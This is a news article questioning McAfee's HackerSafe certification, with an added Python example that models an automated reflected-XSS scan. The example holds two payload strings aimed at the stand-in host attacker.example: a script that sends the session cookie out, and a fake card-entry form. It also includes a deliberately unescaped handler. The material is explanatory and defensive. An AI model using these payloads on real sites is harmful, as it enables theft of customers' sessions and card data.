McAfee's HackerSafe certification called into question
McAfee's HackerSafe is a service that looks for vulnerabilities on websites using automated tools. Websites that pass the test may bear the HackerSafe logo. Certification is intended to increase customers' trust that the website protects their data, for instance in payment transactions.
To receive the HackerSafe label, websites must, for instance, patch published vulnerabilities in the web applications they use. According to a description of HackerSafe, the security service provider uses port scans and other methods to check server security; it also looks for SQL injection holes in web applications and for vulnerabilities that allow cross-site scripting (XSS). Certified websites are inspected daily. On the HackerSafe website, the provider also claims that certification covers PCI compliance, meaning that certified websites comply with the Payment Card Industry Data Security Standard (PCI DSS), a standard that is itself somewhat controversial.
A spokesperson for McAfee told British media that the company does not consider cross-site scripting holes to be as critical as SQL injection or other vulnerabilities. She said that at the moment the mere existence of an XSS hole would not be grounds for revoking HackerSafe certification, though whenever McAfee finds XSS, the company informs its customers. She added that the XSS holes in question cannot be exploited to break into enterprise servers.
In the end, the HackerSafe certificate merely indicates that automated scans found none of the known vulnerabilities they test for on a company's servers. Certification does not, however, mean that customers of these websites are safe from losing their data, or, where credit cards are used for payment, their money, to cyber-criminals.
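To make the dispute concrete, the following added example (not code from the article, from McAfee or from any certified site) models the kind of reflected-XSS probe an automated website scanner runs, and shows why an XSS hole that cannot be used to "break into the server" still endangers the site's customers. The two handlers, the probe marker and the payloads are constructed stand-ins: a search page that echoes its `q` parameter, once unescaped and once with HTML escaping.

```python
import html

# Constructed example: an automated reflected-XSS check of the kind a website
# scanner performs, run against a vulnerable and a hardened search-page handler.
# Both handlers are hypothetical stand-ins that take the "q" query parameter and
# return the HTML body a server would send back.

# Probe marker containing every character that must be escaped in HTML text
# and attribute context; if it comes back verbatim, the page reflects unescaped.
PROBE = '<xsschk "\'>'


def vulnerable_search(q: str) -> str:
    # Echoes user input straight into the page: reflected XSS.
    return f"<html><body><h1>Results for {q}</h1></body></html>"


def hardened_search(q: str) -> str:
    # Escapes <, >, &, " and ' before the input is placed in the HTML body.
    return f"<html><body><h1>Results for {html.escape(q, quote=True)}</h1></body></html>"


def reflects_unescaped(handler, probe: str = PROBE) -> bool:
    """Scanner check: True if the probe appears unescaped in the response."""
    return probe in handler(probe)


def scan(handlers: dict) -> dict:
    """Run the reflection check over a set of named handlers."""
    return {name: reflects_unescaped(h) for name, h in handlers.items()}


# Payloads that never touch the server's filesystem or database but hit the
# customer: the first exfiltrates the session cookie, the second overlays a
# fake card-entry form. attacker.example is a reserved, non-routable name.
COOKIE_THEFT = ('<script>new Image().src="https://attacker.example/c?"'
                '+encodeURIComponent(document.cookie)</script>')
FAKE_PAYMENT_FORM = ('<form action="https://attacker.example/pay">'
                     'Card number: <input name="pan"></form>')


def payload_executes(handler, payload: str) -> bool:
    """True if the payload is delivered verbatim, i.e. a browser would run it."""
    return payload in handler(payload)


def demo():
    handlers = {"vulnerable": vulnerable_search, "hardened": hardened_search}
    for name, reflected in scan(handlers).items():
        print(f"{name:10s} reflects unescaped: {reflected}")
    for payload in (COOKIE_THEFT, FAKE_PAYMENT_FORM):
        print("vulnerable delivers payload:",
              payload_executes(vulnerable_search, payload))
        print("hardened delivers payload:  ",
              payload_executes(hardened_search, payload))


if __name__ == "__main__":
    demo()
```

The check only catches reflected XSS on the parameters it probes; stored and DOM-based XSS need the scanner to submit data and later revisit, or to evaluate the page's own scripts, so a clean scan result says nothing about those. The point the spokesperson's remark misses is visible in the payloads: neither one compromises the server, yet both take the customer's session or card data, which is exactly what the logo is supposed to reassure them about.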
* Still not Hacker safe, roll the video, Russ McRee's blog entry